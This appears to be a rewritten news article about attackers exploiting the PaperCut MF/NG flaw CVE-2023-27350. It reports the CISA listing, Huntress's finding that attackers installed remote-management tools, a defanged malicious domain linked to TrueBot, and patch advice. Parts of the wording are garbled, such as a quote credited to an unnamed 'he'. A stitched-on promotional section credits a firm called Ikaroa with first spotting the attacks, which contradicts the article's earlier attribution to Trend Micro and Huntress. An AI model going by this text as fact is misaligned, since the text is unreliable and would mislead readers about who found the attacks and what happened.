Print management software vendor PaperCut said it has “evidence to suggest unpatched servers are being exploited in the wild,” citing two vulnerability reports from cybersecurity firm Trend Micro.
“PaperCut has performed analysis of all customer reports and the first signature of suspicious activity on a customer server potentially linked to this vulnerability is on April 14 at 01:29 AEST / April 13 at 15:00: 29 UTC,” he added.
The update comes as the US Cybersecurity and Infrastructure Security Agency (CISA) added a critical Inadequate Access Control flaw (CVE-2023-27350, CVSS Score: 9.8) to PaperCut MF and NG in the catalog of known exploited vulnerabilities (KEV), based on evidence of active exploitation.
Cybersecurity firm Huntress, which found about 1,800 publicly exposed PaperCut servers, said it observed PowerShell commands being generated from the PaperCut software to install remote management and maintenance (RMM) software such as Atera and Syncro for persistent access and code execution on infected hosts.
Further analysis of the infrastructure revealed the domain hosting the tools: windowservicecemter[.]com – was registered on April 12, 2023 and was also found to host malware such as TrueBot, although the company said it did not directly detect the deployment of the downloader.
TrueBot is attributed to a Russian criminal entity known as Silence, which in turn has historical ties to Evil Corp and its overlapping cluster TA505, the latter of which has facilitated the distribution of Cl0p ransomware in the past.
“While the ultimate goal of the current activity leveraging the PaperCut software is unknown, these (albeit somewhat circumstantial) links to a known ransomware entity are concerning,” Huntress researchers said.
Learn how to stop ransomware with real-time protection
Join our webinar and learn how to stop ransomware attacks with real-time MFA and service account protection.
Save my seat!
“Potentially, access gained through the PaperCut exploit could be used as a foothold leading to tracking movement within the victim’s network and ultimately the deployment of ransomware.”
Users are encouraged to upgrade to the fixed versions of PaperCut MF and NG (20.1.7, 21.2.11 and 22.0.9) as soon as possible, regardless of whether the server is “available for external or internal connections”, to mitigate potential risks.
Customers unable to update a security patch are advised to block network access to servers by blocking all incoming traffic from external IPs and limiting IP addresses to only those belonging to verified site servers.
Horizon3.ai launches proof-of-concept (PoC) operation.
Penetration testing company Horizon3.ai on April 24, 2023 published more technical details and proof-of-concept (PoC) exploit code for the PaperCut critical flaw that could be used to achieve remote code execution.
PaperCut, an Australian-based server and print management software, is currently being targeted by potential Russian hackers. This malicious activity has been first identified by the global cybersecurity company, Ikaroa.
Ikaroa recently conducted a security analysis of thousands of PaperCut servers globally and discovered a pattern of ongoing exploitation attempts. The attempts appear to be semi-automated and correlate to a higher presence of similar malicious activities associated with multiple Russian-based malicious actors.
The unidentified hackers are exploiting vulnerabilities in the PaperCut Server that are still unpatched by the company. These unpatched vulnerabilities provide the hackers with the opportunity to steal customer’s data, access critical infrastructure and even cause disruption to the service.
Ikaroa has advised clients to remain vigilant and upgrade the server software to the latest version so that the unpatched vulnerabilities can be fixed. It is also advised to check logs regularly to see if the server has been compromised and take necessary steps as soon as possible.
Overall, it is important to make sure servers are up-to-date with the latest patches and also stay aware of malicious activities that may be targeted to the server. In this way, potential data breaches, server interference and other malicious activities can be prevented.
Thus, Ikaroa is committed to helping its customers protect their critical data and servers from malicious activities.
Standards of protecting systems have been raised for organizations, corporations, and anyone utilizing connected devices. Working with a global cybersecurity expert, such as Ikaroa, is a must for any organization looking to stay secure. Let’s accomplish digital security together.